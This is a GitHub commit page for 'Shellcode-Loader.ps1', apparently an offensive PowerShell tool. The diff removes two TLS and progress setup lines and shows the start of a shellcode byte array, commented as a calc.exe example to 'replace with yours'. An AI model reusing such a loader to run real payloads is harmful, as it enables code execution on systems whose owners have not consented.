Skip to content

Commit 90ba53f

Browse files
authored
Update Shellcode-Loader.ps1
1 parent 91c0849 commit 90ba53f

File tree

1 file changed

+1
-2
lines changed

1 file changed

+1
-2
lines changed

Shellcode-Loader.ps1

+1-2
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,4 @@
1-
$ProgressPreference = 'SilentlyContinue'
2-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls
1+
32
# start calc.exe (Will start calculator.exe), example shellcode, replace with yours
43
[Byte[]] $shellcode = @(0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54,
54
0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76,

0 commit comments

Comments
 (0)